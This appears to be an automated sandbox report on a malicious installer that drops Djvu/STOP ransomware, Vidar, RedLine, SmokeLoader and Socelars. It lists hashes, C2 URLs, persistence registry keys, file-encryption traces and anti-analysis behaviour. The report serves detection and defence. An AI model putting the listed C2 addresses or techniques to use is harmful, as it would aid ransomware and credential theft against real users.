Overview
Tasks and scores: Static 10; the sample on windows7_x64 (4 tasks), windows11_x64 (1 task) and windows10_x64 (5 tasks), each scored 10 where a score is shown.
Analysis
- max time kernel: 1812s
- max time network: 1815s
- platform: windows7_x64
- resource: win7-fr
- submitted: 11-09-2021 20:41
Static task: static1
Behavioral tasks (sample setup_x86_x64_install.exe in every task):
- behavioral1: resource win7-jp
- behavioral2: resource win7-fr
- behavioral3: resource win7v20210408
- behavioral4: resource win7-de
- behavioral5: resource win11
- behavioral6: resource win10v20210408
- behavioral7: resource win10-jp
- behavioral8: resource win10-fr
- behavioral9: resource win10-en
- behavioral10: resource win10-de
General
- Target: setup_x86_x64_install.exe
- Size: 3.4MB
- MD5: f59a5fd82eaf0088e7853c09922ce477
- SHA1: 969d1debc32996a4d53c4a36d2241511cb8b77ec
- SHA256: 291505b584fdf540a1590ce7181d85cee7967f99cbf05aeb7b7031b6a9b4f2cd
- SHA512: 344192b08874df2cf922f782400435f109eb5bab7c3c582f4eb3fe328cadcb2d2c3ddd02ba816663168f9c997766f089731e657afe2cefb7bda773e6e6dca71c
Malware Config
Extracted: djvu
  C:\_readme.txt
  https://we.tl/t-CtDpAM1g5f
Extracted: vidar
  40.5
  706
  https://gheorghip.tumblr.com/
  profile_id: 706
Extracted: smokeloader
  2020
  http://varmisende.com/upload/
  http://fernandomayol.com/upload/
  http://nextlytm.com/upload/
  http://people4jan.com/upload/
  http://asfaltwerk.com/upload/
Extracted: vidar
  40.5
  517
  https://gheorghip.tumblr.com/
  profile_id: 517
Extracted: vidar
  40.5
  993
  https://gheorghip.tumblr.com/
  profile_id: 993
Signatures
-
Detected Djvu ransomware 2 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/2660-338-0x0000000003060000-0x000000000317B000-memory.dmp | family_djvu
  behavioral2/memory/2448-339-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process | target process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2568 | 1636 | rundll32.exe |
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1360 | 1636 | rundll32.exe |
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/2944-272-0x000000000041C5E2-mapping.dmp | family_redline
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 5 IoCs
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe | family_socelars
  C:\Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe | family_socelars
  \Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe | family_socelars
  \Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe | family_socelars
  \Users\Admin\AppData\Local\Temp\7zS0D696124\Sat196ac06a9e6.exe | family_socelars
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 5 IoCs
Processes:
  resource | yara_rule
  behavioral2/memory/1660-177-0x0000000000400000-0x00000000017F2000-memory.dmp | family_vidar
  behavioral2/memory/2028-347-0x00000000021D0000-0x00000000022A2000-memory.dmp | family_vidar
  behavioral2/memory/2536-348-0x0000000000400000-0x00000000004D5000-memory.dmp | family_vidar
  behavioral2/memory/2272-363-0x0000000000400000-0x0000000002BC5000-memory.dmp | family_vidar
  behavioral2/memory/2272-362-0x00000000002C0000-0x0000000000391000-memory.dmp | family_vidar
-
Processes:
  resource | yara_rule
  \Users\Admin\AppData\Local\Temp\7zS0D696124\libcurl.dll | aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS0D696124\libcurl.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS0D696124\libcurlpp.dll | aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS0D696124\libcurlpp.dll | aspack_v212_v242
  C:\Users\Admin\AppData\Local\Temp\7zS0D696124\libstdc++-6.dll | aspack_v212_v242
  \Users\Admin\AppData\Local\Temp\7zS0D696124\libstdc++-6.dll | aspack_v212_v242
-
Blocklisted process makes network request 64 IoCs
Processes:
  flow | pid | process
  flows 136, 138, 139, 141, 143, 145 and 147 through 204 (64 flows in total) | 2848 | MsiExec.exe
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | 46807GHF____.exe
-
Executes dropped EXE 64 IoCs
Processes:
  pid | process (64 entries)
  1744 setup_installer.exe, 1068 setup_install.exe, 620 Sat191649b47c9e2.exe, 676 Sat196ac06a9e6.exe, 1612 Sat19e4750dd01.exe, 820 Sat199ba8a4637dcb034.exe, 1740 Sat19ba05e89ea6d406.exe, 596 Sat1946eb84e6.exe,
  1660 Sat19e6a852f849bb2.exe, 988 Sat19c6762a08beae.exe, 2140 Sat19ba05e89ea6d406.tmp, 2528 46807GHF____.exe, 2872 795168.exe, 2900 8209560.exe, 2932 6384253.exe, 2960 ultramediaburner.exe,
  3008 Vososamime.exe, 3032 5771500.exe, 3048 Maeqeshyhoto.exe, 560 7915684.exe, 1644 ultramediaburner.tmp, 1996 UltraMediaBurner.exe, 2632 C3KHKEn~m73GVLA.exE, 2412 WinHoster.exe,
  2944 6384253.exe, 1264 GcleanerEU.exe, 856 installer.exe, 2604 anyname.exe, 2120 gcleaner.exe, 1780 510D.exe, 1964 6AA6.exe, 2660 8BAE.exe,
  2448 8BAE.exe, 2908 DllHost.exe, 2128 8BAE.exe, 2532 BEEF.exe, 2028 build2.exe, 2536 build2.exe, 2636 build3.exe, 2724 build3.exe,
  2400 mstsca.exe, 2432 4010.exe, 1528 WnUKuKwEyu.exe, 2272 629F.exe, 688 mstsca.exe, 1480 A8B4.exe, 1956 mstsca.exe, 2456 mstsca.exe,
  1732 mstsca.exe, 1504 mstsca.exe, 1756 AdvancedWindowsManager.exe, 1808 AdvancedWindowsManager.exe, 2032 AdvancedWindowsManager.exe, 4344 AdvancedWindowsManager.exe, 4372 AdvancedWindowsManager.exe, 5988 AdvancedWindowsManager.exe,
  7960 mstsca.exe, 7976 mstsca.exe, 2504 mstsca.exe, 2340 mstsca.exe, 7956 mstsca.exe, 8012 mstsca.exe, 8028 mstsca.exe, 7956 mstsca.exe
-
Modifies extensions of user files 12 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
  description | ioc | process
  File renamed | C:\Users\Admin\Pictures\LimitEnter.png => C:\Users\Admin\Pictures\LimitEnter.png.wiot | 8BAE.exe
  File opened for modification | C:\Users\Admin\Pictures\SplitSkip.tiff | 8BAE.exe
  File renamed | C:\Users\Admin\Pictures\SplitSkip.tiff => C:\Users\Admin\Pictures\SplitSkip.tiff.wiot | 8BAE.exe
  File renamed | C:\Users\Admin\Pictures\InitializeWatch.png => C:\Users\Admin\Pictures\InitializeWatch.png.wiot | 8BAE.exe
  File opened for modification | C:\Users\Admin\Pictures\MergeExpand.tiff | 8BAE.exe
  File renamed | C:\Users\Admin\Pictures\MergeExpand.tiff => C:\Users\Admin\Pictures\MergeExpand.tiff.wiot | 8BAE.exe
  File renamed | C:\Users\Admin\Pictures\OpenStart.tif => C:\Users\Admin\Pictures\OpenStart.tif.wiot | 8BAE.exe
  File renamed | C:\Users\Admin\Pictures\OutWatch.crw => C:\Users\Admin\Pictures\OutWatch.crw.wiot | 8BAE.exe
  File renamed | C:\Users\Admin\Pictures\RestoreNew.raw => C:\Users\Admin\Pictures\RestoreNew.raw.wiot | 8BAE.exe
  File renamed | C:\Users\Admin\Pictures\ResumePublish.raw => C:\Users\Admin\Pictures\ResumePublish.raw.wiot | 8BAE.exe
  File renamed | C:\Users\Admin\Pictures\SplitUnlock.tif => C:\Users\Admin\Pictures\SplitUnlock.tif.wiot | 8BAE.exe
  File renamed | C:\Users\Admin\Pictures\TraceJoin.png => C:\Users\Admin\Pictures\TraceJoin.png.wiot | 8BAE.exe
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 4010.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 4010.exe
-
Loads dropped DLL 64 IoCs
Processes:
  pid | process (64 entries; a count in parentheses is the number of identical rows)
  1996 setup_x86_x64_install.exe, 1744 setup_installer.exe (6), 1068 setup_install.exe (8),
  800 cmd.exe, 1920 cmd.exe, 920 cmd.exe (2), 992 cmd.exe, 1968 cmd.exe, 972 cmd.exe, 1732 cmd.exe (2), 1752 cmd.exe (2),
  1612 Sat19e4750dd01.exe (2), 1740 Sat19ba05e89ea6d406.exe (3), 596 Sat1946eb84e6.exe (2), 676 Sat196ac06a9e6.exe (2), 1660 Sat19e6a852f849bb2.exe (2), 2140 Sat19ba05e89ea6d406.tmp (4),
  2576 rundll32.exe (4), 2900 8209560.exe (2), 2932 6384253.exe (2), 2960 ultramediaburner.exe (3), 3032 5771500.exe (2), 560 7915684.exe (2), 1644 ultramediaburner.tmp (6), 1632 WerFault.exe (2)
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\ZHavetohamo.exe\"" | 46807GHF____.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" | 8209560.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\8eba5073-8b2a-4439-97a1-0cbad0b7ee97\\8BAE.exe\" --AutoStart" | 8BAE.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 4010.exe
-
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description | ioc | process
  File opened (read-only) | \??\A: through \??\Z:, every drive letter except C: and D: (24 entries) | installer.exe
  File opened (read-only) | \??\A: through \??\Z:, every drive letter except C: and D: (24 entries) | msiexec.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 24 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  6050, 11, 124, 5766, 6010, 5726, 807, 3107, 4010, 5460, 1015, 2498, 6085, 6199, 1536, 2188, 6146 | ip-api.com
  4286, 5097, 234, 241, 4533, 4534, 235 | api.2ip.ua
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
  pid | process
  2432 | 4010.exe
-
Suspicious use of SetThreadContext 34 IoCs
Processes:
  process -> target process | description (source PID -> target PID)
  6384253.exe -> 6384253.exe | PID 2932 set thread context of 2944
  8BAE.exe -> 8BAE.exe | 2660 -> 2448, 7704 -> 8068, 4728 -> 4804, 4660 -> 4964
  DllHost.exe -> 8BAE.exe | 2908 -> 2128
  build2.exe -> build2.exe | 2028 -> 2536
  build3.exe -> build3.exe | 2636 -> 2724
  mstsca.exe -> mstsca.exe | 2400 -> 688, 1956 -> 2456, 1732 -> 1504, 7960 -> 7976, 2504 -> 2340, 7956 -> 8012, 8028 -> 7956, 7944 -> 8000, 7728 -> 7684, 1160 -> 7692, 8080 -> 2624, 7724 -> 7868, 7760 -> 7748, 2368 -> 1768, 7216 -> 7244, 7508 -> 7532, 4484 -> 4520, 4952 -> 5044, 4676 -> 4880, 3336 -> 3376, 3872 -> 3892, 3960 -> 3964, 7612 -> 3184, 328 -> 1272, 1520 -> 828, 5000 -> 3152
-
Drops file in Program Files directory 15 IoCs
Processes:
  description | ioc | process
  File created | C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe.config | 46807GHF____.exe
  File opened for modification | C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe | ultramediaburner.tmp
  File opened for modification | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | ultramediaburner.tmp
  File created | C:\Program Files (x86)\Windows Media Player\ZHavetohamo.exe | 46807GHF____.exe
  File created | C:\Program Files (x86)\UltraMediaBurner\unins000.dat | ultramediaburner.tmp
  File created | C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe | msiexec.exe
  File created | C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk | msiexec.exe
  File created | C:\Program Files (x86)\Windows Media Player\ZHavetohamo.exe.config | 46807GHF____.exe
  File created | C:\Program Files (x86)\UltraMediaBurner\is-4ITOB.tmp | ultramediaburner.tmp
  File created | C:\Program Files (x86)\UltraMediaBurner\is-TAU4D.tmp | ultramediaburner.tmp
  File created | C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe | msiexec.exe
  File opened for modification | C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini | msiexec.exe
  File opened for modification | C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url | msiexec.exe
  File created | C:\Program Files\Mozilla Firefox\YFFUNBFGNC\ultramediaburner.exe | 46807GHF____.exe
  File opened for modification | C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url | msiexec.exe
-
Drops file in Windows directory 30 IoCs
Processes:
  description | ioc (process is msiexec.exe for all 30 rows)
  File created | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe
  File created | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe
  File created | C:\Windows\Installer\f761390.msi
  File opened for modification | C:\Windows\Installer\MSI7BE8.tmp
  File opened for modification | C:\Windows\Installer\MSI836A.tmp
  File opened for modification | C:\Windows\Installer\MSI2DBC.tmp
  File opened for modification | C:\Windows\Installer\MSI780F.tmp
  File opened for modification | C:\Windows\Installer\MSI40C1.tmp
  File opened for modification | C:\Windows\Installer\MSI6B40.tmp
  File opened for modification | C:\Windows\Installer\MSI7A52.tmp
  File opened for modification | C:\Windows\Installer\MSI3E60.tmp
  File opened for modification | C:\Windows\Installer\MSI2501.tmp
  File opened for modification | C:\Windows\Installer\MSI4390.tmp
  File opened for modification | C:\Windows\Installer\MSI46EB.tmp
  File opened for modification | C:\Windows\Installer\
  File opened for modification | C:\Windows\Installer\MSI757F.tmp
  File opened for modification | C:\Windows\Installer\MSI7ED6.tmp
  File opened for modification | C:\Windows\Installer\MSI1D33.tmp
  File opened for modification | C:\Windows\Installer\MSI71F5.tmp
  File opened for modification | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe
  File opened for modification | C:\Windows\Installer\MSI5E33.tmp
  File opened for modification | C:\Windows\Installer\MSI2B0C.tmp
  File created | C:\Windows\Installer\f761392.ipi
  File opened for modification | C:\Windows\Installer\MSI5FC9.tmp
  File opened for modification | C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe
  File opened for modification | C:\Windows\Installer\f761392.ipi
  File opened for modification | C:\Windows\Installer\MSI2724.tmp
  File opened for modification | C:\Windows\Installer\MSI2909.tmp
  File created | C:\Windows\Installer\f761394.msi
  File opened for modification | C:\Windows\Installer\f761390.msi
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
  pid | pid_target | process | target process
  1632 | 1660 | WerFault.exe | Sat19e6a852f849bb2.exe
  2216 | 2932 | WerFault.exe | 6384253.exe
  2864 | 560 | WerFault.exe | 7915684.exe
  948 | 2872 | WerFault.exe | 795168.exe
-
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | avwvuuw
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | avwvuuw
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sat19c6762a08beae.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | avwvuuw
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | avwvuuw
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | avwvuuw
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | avwvuuw
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sat19c6762a08beae.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sat19c6762a08beae.exe
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | cmd.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | cmd.exe
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid | process
  2504 | schtasks.exe
  2336 | schtasks.exe
  2084 | schtasks.exe
-
Delays execution with timeout.exe 4 IoCs
Processes:
  pid | process
  2148 | timeout.exe
  1548 | timeout.exe
  2028 | timeout.exe
  752 | timeout.exe
-
Kills process with taskkill 8 IoCs
Processes:
  pid | process
  1620 | taskkill.exe
  2712 | taskkill.exe
  2452 | taskkill.exe
  436 | taskkill.exe
  2440 | taskkill.exe
  744 | taskkill.exe
  880 | taskkill.exe
  2680 | taskkill.exe
-
Processes:
  description | ioc | process (64 rows; every key below is under \REGISTRY\USER\S-1-5-21-1669990088-476967504-438132596-1000\Software\Microsoft\Internet Explorer, written as IE; a count in parentheses is the number of identical rows)
  Key created | IE\Recovery\PendingRecovery | iexplore.exe
  Key created | IE\Main | IEXPLORE.EXE (10)
  Key created | IE\Main | iexplore.exe
  Key created | IE\Main\WindowsSearch | IEXPLORE.EXE (9)
  Key created | IE\Main\WindowsSearch | iexplore.exe
  Set value (str) | IE\Main\WindowsSearch\Version = "WS not running" | IEXPLORE.EXE (9)
  Set value (str) | IE\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
  Set value (str) | IE\Main\FullScreen = "no" | iexplore.exe
  Set value (data) | IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3200000032000000b804000097020000 | iexplore.exe
  Set value (data) | IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff19000000190000009f0400007e020000 | iexplore.exe
  Set value (data) | IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000 | iexplore.exe
  Set value (data) | IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000 | iexplore.exe
  Set value (data) | IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
  Set value (data) | IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | iexplore.exe
  Set value (data) | IE\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 | iexplore.exe
  Set value (int) | IE\Main\CompatibilityFlags = "0" | iexplore.exe
  Set value (data) | IE\TabbedBrowsing\NewTabPage\LastProcessed = a0dd594b4da7d701 | iexplore.exe
  Key created | IE\TabbedBrowsing\NewTabPage | iexplore.exe
  Set value (data) | IE\TabbedBrowsing\NewTabPage\MFV = [value elided] | iexplore.exe (3)
  Set value (data) | IE\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d327e8bcedb2d4b986abc323ea826ca000000000200000000001066000000010000200000006d36882dd280068e164d92db32dd17a3509bc02b5b3c50f71d6267bb18af16c7000000000e80000000020000200000003c2b8713e79d726d6320a21c6f7332dec36c6cc961e074af8657f7af94ebd5272000000016662fd3f087f26db797847107eaf6772f860f0ad5ee2da030ea584e7674dcb740000000581a6a632d571adb3fb28150c3e9a7686a9e09ecae6c694031e4c6062a7955c4302123f8b91562801270d795fda6d4aa967dfca6755e58013c577ec4fda2d40a | iexplore.exe
  Set value (int) | IE\TabbedBrowsing\NTPFirstRun = "1" | iexplore.exe
  Key created | IE\LowRegistry | iexplore.exe
  Key created | IE\LowRegistry\DontShowMeThisDialogAgain | iexplore.exe
  Key created | IE\LowRegistry\DOMStorage | iexplore.exe
  Key created | IE\DomainSuggestion | iexplore.exe
  Key created | IE\DomainSuggestion\FileNames\ | iexplore.exe
  Key created | IE\DomainSuggestion\FileNames | iexplore.exe
  Key created | IE\Toolbar | iexplore.exe
  Key created | IE\Toolbar\WebBrowser | iexplore.exe
  Key created | IE\PageSetup | iexplore.exe
  Key created | IE\IETld\LowMic | iexplore.exe
  Key created | IE\BrowserEmulation\LowMic | iexplore.exe
  Key created | IE\IntelliForms | iexplore.exe
  Key created | IE\Zoom | iexplore.exe
  Key created | IE\Recovery\AdminActive | iexplore.exe
  Set value (int) | IE\Recovery\AdminActive\{68F96110-1340-11EC-A404-D2CAC2128933} = "0" | iexplore.exe
  Set value (int) | IE\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
-
Modifies data under HKEY_USERS 3 IoCs
Processes: msiexec.exe
description | ioc | process
- Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E | msiexec.exe
- Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25 | msiexec.exe
- Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26 | msiexec.exe
Modifies registry class 24 IoCs
Processes: msiexec.exe
description | ioc | process (<Installer> stands for \REGISTRY\MACHINE\SOFTWARE\Classes\Installer)
- Set value (int) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0" | msiexec.exe
- Set value (str) | <Installer>\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26 | msiexec.exe
- Set value (str) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" | msiexec.exe
- Set value (str) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\" | msiexec.exe
- Key created | <Installer>\Features\C414548CC3098124D97E31A29BF7FD26 | msiexec.exe
- Set value (str) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" | msiexec.exe
- Set value (int) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033" | msiexec.exe
- Set value (int) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0" | msiexec.exe
- Set value (str) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" | msiexec.exe
- Set value (str) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe" | msiexec.exe
- Set value (str) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]" | msiexec.exe
- Key created | <Installer>\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9 | msiexec.exe
- Key created | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\SourceList | msiexec.exe
- Set value (str) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";" | msiexec.exe
- Set value (int) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216" | msiexec.exe
- Set value (int) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1" | msiexec.exe
- Set value (int) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388" | msiexec.exe
- Set value (int) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" | msiexec.exe
- Key created | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media | msiexec.exe
- Set value (data) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000 | msiexec.exe
- Set value (str) | <Installer>\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature | msiexec.exe
- Key created | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26 | msiexec.exe
- Set value (str) | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi" | msiexec.exe
- Key created | <Installer>\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net | msiexec.exe
Modifies system certificate store 12 IoCs
Processes: Sat19e6a852f849bb2.exe, anyname.exe, installer.exe, Sat196ac06a9e6.exe
description | ioc | process (<AuthRoot> stands for \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates)
- Set value (data) | <AuthRoot>\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [value elided] | Sat19e6a852f849bb2.exe
- Key created | <AuthRoot>\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | anyname.exe
- Set value (data) | <AuthRoot>\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [value elided] | anyname.exe
- Set value (data) | <AuthRoot>\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [value elided] | installer.exe
- Set value (data) | <AuthRoot>\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [value elided] | installer.exe
- Set value (data) | <AuthRoot>\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = [value elided] | Sat196ac06a9e6.exe
- Key created | <AuthRoot>\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | Sat19e6a852f849bb2.exe
- Key created | <AuthRoot>\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | installer.exe
- Set value (data) | <AuthRoot>\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = [value elided] | installer.exe
- Key created | <AuthRoot>\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | installer.exe
- Key created | <AuthRoot>\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | Sat196ac06a9e6.exe
- Set value (data) | <AuthRoot>\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [value elided] | anyname.exe
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description | flow | ioc
- HTTP User-Agent header | 10 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- HTTP User-Agent header | 121 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: CmdExeWriteProcessMemorySpam 4 IoCs
Processes: GcleanerEU.exe, installer.exe, anyname.exe, gcleaner.exe
pid | process
- 1264 | GcleanerEU.exe
- 856 | installer.exe
- 2604 | anyname.exe
- 2120 | gcleaner.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe, ultramediaburner.tmp, WerFault.exe, Sat19c6762a08beae.exe
pid | process (consecutive repeats collapsed with a count)
- 1884 | powershell.exe
- 1644 | ultramediaburner.tmp (×2)
- 1632 | WerFault.exe (×7)
- 988 | Sat19c6762a08beae.exe (×2)
- 1212 | (no process name recorded) (×41)
- 2216 | WerFault.exe (×7)
- 1212 | (no process name recorded) (×4)

Suspicious behavior: GetForegroundWindowSpam 6 IoCs
Processes: WerFault.exe, iexplore.exe
pid | process
- 1212 | (no process name recorded)
- 1632 | WerFault.exe
- 2216 | WerFault.exe
- 2864 | WerFault.exe
- 948 | WerFault.exe
- 2552 | iexplore.exe

Suspicious behavior: MapViewOfSection 3 IoCs
Processes: Sat19c6762a08beae.exe, avwvuuw
pid | process
- 988 | Sat19c6762a08beae.exe
- 7964 | avwvuuw
- 4964 | avwvuuw

Suspicious use of AdjustPrivilegeToken 64 IoCs
